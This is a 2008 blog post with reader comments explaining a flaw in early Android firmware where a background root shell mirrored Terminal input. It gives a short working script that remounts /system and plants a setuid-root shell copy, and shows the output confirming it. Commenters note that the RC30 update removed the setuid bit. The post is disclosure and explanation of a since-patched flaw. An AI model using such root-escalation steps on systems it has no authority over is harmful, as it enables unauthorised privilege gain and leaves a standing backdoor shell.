People noticed that running telnetd seemed to run as root. Later it was discovered that everything you typed was being run by the root user also. So, that ends the first mystery: when you typed “telnetd” both the Terminal user and root ran it. It would fail (without error messages) for the Terminal user, and run successfully for the root user. So now, the question is, what the f is a root shell doing mirroring user input?!
So, there is a much easier way to get root that doesn’t require network connectivity. While the /sdcard mount point is nosuid,noexec, it’ll still run scripts if you explicitly direct them to run. It seems that the weird background root shell doesn’t understand the alt-keys, so it can only run stuff that can be typed without using alt, shift, etc. So, put the following in /sdcard/pwn:
mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system
cd /system/bin
cat sh > sh.root
chmod 4755 sh.root
mount -o remount,ro -t yaffs2 /dev/block/mtdblock3 /system
You can either do this by dropping the file in place over USB mass storage, or you can type it via the Terminal using “cat“. (Rebooting here might help get the root shell in a sane state.) Finally, just navigate there without slashes and run the script:
$ cd sdcard
$ sh pwn
You’ll see lots of errors (but these are only from the Terminal user). The script is, however, run by the root shell too. You can verify the results:
$ ls -l /system/bin/sh*
-rwxr-xr-x root shell 86936 2008-09-13 00:13 sh
-rwsr-xr-x root root 86936 2008-11-09 10:12 sh.root
Next up: cross-compiling a little helper to elevate to real UID 0, and require a password to keep malware from looking for setuid shells.
© 2008, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
I tried something similar, then applied update to RC30 and the suid root flag got removed, either from rebooting or from the update, if you haven’t updated to RC30 could you reboot and see if the suid root bit is still set.
Comment by S — November 9, 2008 @ 6:53 pm
Actually, I think it must have been the update, since I did a test before the upgrade. After I created telnetd copy suid root, I rebooted, then typed cat to make the console service useless, then opened a terminal and ran the suid root copy of telnetd and it worked as expected.
Comment by S — November 9, 2008 @ 7:15 pm
It’s definitely the RC30 update:
$ grep set_perm update-script
set_perm_recursive 0 0 0755 0644 SYSTEM:
set_perm_recursive 0 2000 0755 0755 SYSTEM:bin
set_perm 0 3004 02755 SYSTEM:bin/ping
set_perm 0 3003 02755 SYSTEM:bin/netcfg
set_perm 1002 1002 0440 SYSTEM:etc/dbus.conf
set_perm 0 2000 0550 SYSTEM:etc/init.goldfish.sh
set_perm 1002 1002 0440 SYSTEM:etc/hcid.conf
set_perm 1014 2000 0550 SYSTEM:etc/dhcpcd/dhcpcd-run-hooks
Comment by S — November 9, 2008 @ 7:42 pm
I’d try RC30 if my phone ever comes around on the update cycle. *continues waiting*
Comment by kees — November 9, 2008 @ 9:45 pm
You can update yourself if you download the update, put it in the root of SD card and rename it to update.zip, then power down, and boot up while holding down “Home”. But then no more easy root for you.
Comment by S — November 10, 2008 @ 2:56 pm
Ok, so what should the script be called and what file extention is needed please? I assume I am to create the above code as a script and place it in /sdcard/pwn after creating the pwn directory, correct? I’m kinda noobish sometime guys. ;)
Comment by Duncan — December 17, 2008 @ 4:16 am